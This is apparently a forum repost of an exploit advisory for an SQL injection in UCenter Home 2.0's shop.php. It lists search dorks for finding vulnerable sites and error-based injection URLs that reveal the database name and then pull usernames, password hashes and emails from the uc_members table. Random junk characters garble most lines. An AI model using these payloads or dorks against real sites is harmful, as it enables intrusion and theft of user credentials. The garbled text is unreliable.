! y) ~8 D1 c. {3 W: ~__--==UCenter Home 2.0 -(0day) Remote SQL Injection Vulnerability==--__ & m' ^( u* @1 d! {
8 Z) m, H, J( B# O4 f9 Z
" { r0 C# v1 q' o0 ]# L6 Y6 ]2 t; J) @4 k
*/ Author : KnocKout
6 N. _/ D* B9 ^$ c7 j6 c ^9 X" v( ^, F6 H/ i, a! X
*/ Greatz : DaiMon,BARCOD3,RiskY and iranian hackers 3 W( _# E% b$ D; L( z
$ k8 ] c9 L% P4 E
*/ Contact: knockoutr@msn.com
! C. N6 g! V/ F: Y
- Y+ g+ ^! D1 H# E9 K+ j*/ Cyber-Warrior.org/CWKnocKout 9 I% p/ H: [& i( z1 E
/ B ` \7 i6 `: T; B- Q7 X
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== / l4 ~ ^+ G. E" I* e# A
5 X% }1 h6 B. K E6 P
Script : UCenter Home
6 K3 D: e; L% W! z/ c2 e5 U) B
g: T0 o. T$ o( O/ e& b8 [Version : 2.0
p5 ~$ D0 V* a* k: K
- _0 L' G8 o" ?0 }, z- rScript HomePage : http://u.discuz.net/ L5 R/ s( T5 u- X/ K. D w% v& K
! |: m2 h. X. U: f4 P6 ^6 [# ~5 C: w
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--== 5 F' C P Z$ \& @: G
1 l! g/ y( r2 G! T1 E; t, Z& L( a) m
Dork : Powered by UCenter inurl:shop.php?ac=view ! ^, j. w3 _2 R
! i( i" S! l# ]- N4 ~
Dork 2 : inurl:shop.php?ac=view&shopid= 8 w O0 D1 G9 H, {5 i
) u( b8 G1 H. R) n' S* ^
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
2 _7 |( n7 S: a, Q$ I" Q# l4 u( E, X& Z: ]' \: `' i: s% E
Vuln file : Shop.php
: W' u5 l0 |9 g4 c1 J) y j* H% U6 ~& s* v! b0 K
value's : (?)ac=view&shopid=
5 S3 Y" c, ?% t' K- B: h, o! W% y) P6 |, s2 t8 k* @
Vulnerable Style : SQL Injection (MySQL Error Based)
. N# q. w6 M; C5 |# A" i
0 f- y' U% l& YNeed Metarials : Hex Conversion ; z. y4 k0 @4 H% Z8 c
4 o9 I, B( R3 q# \' s
__--==__--==__--==__--==__--==__--==__--==__--==__--==__--==
* K( K0 N/ r. I6 g, x( U2 u B [8 D# f j2 L- ?3 C+ E6 ^) Q
Your Need victim Database name. . {, v" F7 c& [2 ?% ^+ d
: d( [- `& G* i. |/ v5 W! bfor Inject : http://server/shop.php?ac=view&shopid=253 and(select 1 from(select count(*),concat((select (select concat(0x7e,0x27,unhex(hex(database())),0x27,0x7e)) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
A6 L+ p" j+ d. W; s& L9 _* g0 [4 w4 g
..
3 s( y5 O, Q0 F; N3 e& q; u% Y* ]4 W( H9 B4 w* ~- n
DB : Okey.
' {$ V# i' t2 [6 g8 O) i: X
2 d* W& H1 \$ {your edit DB `[TARGET DB NAME]`
7 g$ G3 i# K+ O
) c/ E3 W2 Q y3 D4 r- w" f/ gExample : 'hiwir1_ucenter' / l A. O3 H% f2 U6 v
6 K, P/ T/ B |/ S4 ^3 ^
Edit : Okey. ) z* g! r" R* S$ `4 x: P
: T6 t8 i$ v4 J" \
Your use Hex conversion. And edit Your SQL Injection Exploit..
# d2 i' u8 q1 @; D5 F7 E+ y
, R2 x" C& S- G( c $ h. F s4 l0 [0 g2 _
- b1 ?$ E& z0 r7 D/ W& JExploit Code : http://server/shop.php?ac=view&shopid=253 253 and(select 1 from(select count(*),concat((select (select (SELECT concat(0x7e,0x27,cast(concat(uc_members.uid,0x3a,uc_members.username,0x3a,uc_members.password,0x3a,uc_members.email) as char),0x27,0x7e) FROM `hiwir1_ucenter`.uc_members LIMIT 0,1) ) from information_schema.tables limit 0,1),floor(rand(0)*2))x from information_schema.tables group by x)a) and 1=1
0 a; R2 g! g! w |
发表于 2013-2-27 21:31:31
收藏
支持
反对